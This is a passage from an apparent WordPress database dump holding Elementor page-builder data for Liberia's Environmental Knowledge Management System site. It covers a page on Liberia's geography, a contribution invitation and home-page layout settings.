x_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b20d6bb\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"c40d80d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1b2428a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/seal.png\",\"id\":440},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"90\",\"height\":\"90\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0a34da5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Republic of Liberia\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f41b210\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia is a relatively small country located within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean. In terms of land area, Liberia\\u00a0approximately 111,369 km2 and is the fifth smallest country in Africa.<\\/p><p>The extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005). The country is located at latitudes 4\\u00b021\\u2018N and 8\\u00b033\\u2018 north of the equator and longitudes 11\\u00b028\\u2018W and 7\\u00b032\\u2018W. Within its borders, 15,050 km2 consist of water, and the remaining 96,319 km2 are land.<\\/p><p>The perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. C\\u00f4te d\\u2018Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with C\\u00f4te d\\u2018Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.<\\/p><p>Liberia\\u2018s Exclusive Economic Zone (EEZ) is 229,700 km2, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).<\\/p>\",\"text_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(19302,2821,'_elementor_edit_mode','builder'),(19303,2821,'_elementor_template_type','wp-page'),(19304,2821,'_elementor_version','2.7.5'),(19305,2821,'_wp_page_template','default'),(19306,2821,'_elementor_data','[{\"id\":\"1872628\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b20d6bb\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"c40d80d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1b2428a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/seal.png\",\"id\":440},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"90\",\"height\":\"90\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0a34da5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Republic of Liberia\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f41b210\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia is a relatively small country located within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean. In terms of land area, Liberia\\u00a0approximately 111,369 km<sup>2<\\/sup>, is the fifth smallest country in Africa.<\\/p><p>The extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005). The country is located at latitudes 4\\u00b021\\u2018N and 8\\u00b033\\u2018 north of the equator and longitudes 11\\u00b028\\u2018W and 7\\u00b032\\u2018W. Within its borders, 15,050 km<sup>2<\\/sup> consist of water, and the remaining 96,319 km<sup>2<\\/sup> are land.<\\/p><p>The perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. C\\u00f4te d\\u2018Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with C\\u00f4te d\\u2018Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.<\\/p><p>Liberia\\u2018s Exclusive Economic Zone (EEZ) is 229,700 km<sup>2<\\/sup>, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).<\\/p>\",\"text_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(19307,76,'_elementor_controls_usage','a:5:{s:5:\"image\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:5:\"image\";i:1;s:10:\"image_size\";i:1;s:22:\"image_custom_dimension\";i:1;s:5:\"align\";i:1;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:2:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:2:{s:10:\"text_color\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:1;}}}}}'),(19309,74,'_elementor_edit_mode','builder'),(19310,74,'_elementor_template_type','wp-page'),(19311,74,'_elementor_version','3.4.1'),(19319,74,'_wp_page_template','default'),(19320,74,'_elementor_data','[{\"id\":\"16c3779\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"92f1907\"}]},\"elements\":[{\"id\":\"e489cec\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"843aa5e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contribute a knowledge resource to the EKMS\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f572fa2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2c7325b\"}]},\"elements\":[{\"id\":\"9ddf0a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23948fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Ekmsliberia.info is managed by the <span style=\\\"color: #00ccff;\\\"><a style=\\\"color: #00ccff;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\/institution\\/environmental-protection-agency\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Environmental Protection Agency (EPA)<\\/a><\\/span> of Liberia in collaboration with several partner governmental and other institutions.<\\/p><p>We are interested to hear from individuals and civil society groups who might wish to complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector in Liberia.\\u00a0If you would like to contribute a knowledge resource to the Environmental Knowledge Management System (EKMS) of Liberia, please fill out the appropriate forms below.<\\/p><p>This site focuses on the three Rio Conventions: The United Nations Framework Convention on Climate Change (UNFCCC), United Nations Convention on Biological Diversity (UNCBD) and United Nations Convention to Combat Desertification (UNCCD). Therefore, your resources should be linked to climate change, biodiversity and desertification. Resources may include links to online portals, scientific\\/peer-review publications, technical documents\\/reports, policy briefs, educational\\/training materials, multimedia materials and more. We would also like partner organizations to send their action pledges.<\\/p><p>To learn about becoming a member of the EKMS Community, visit our <a href=\\\"\\/join-the-community\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">\\u2018<span style=\\\"color: #00ccff;\\\">Join the Community<\\/span>\\u2019<\\/a> page.<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6ce574b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fe5c057\"}]},\"elements\":[{\"id\":\"412f77a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2ef1412\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"color: #3366ff;\\\"><a style=\\\"color: #3366ff;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\/contact-us\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Contact us<\\/a> <\\/span>if you are interested in contributing to the EKMS!<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(19321,2824,'_elementor_controls_usage','a:0:{}'),(19322,2824,'_elementor_edit_mode','builder'),(19323,2824,'_elementor_template_type','wp-page'),(19324,2824,'_elementor_version','2.7.5'),(19326,2824,'_wp_page_template','default'),(19327,2824,'_elementor_data','[{\"id\":\"16c3779\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"92f1907\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e489cec\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"843aa5e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contribute a knowledge resource to the EKMS\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(19328,2825,'_elementor_edit_mode','builder'),(19329,2825,'_elementor_template_type','wp-page'),(19330,2825,'_elementor_version','2.7.5'),(19331,2825,'_wp_page_template','default'),(19332,2825,'_elementor_data','[{\"id\":\"16c3779\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"92f1907\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e489cec\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"843aa5e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contribute a knowledge resource to the EKMS\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f572fa2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2c7325b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9ddf0a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19342,2827,'_wp_page_template','default'),(19343,2827,'_elementor_edit_mode','builder'),(19344,2827,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\",\"background_slideshow_slide_transition\":\"slide_left\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\",\"padding\":{\"unit\":\"px\",\"top\":\"130\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_o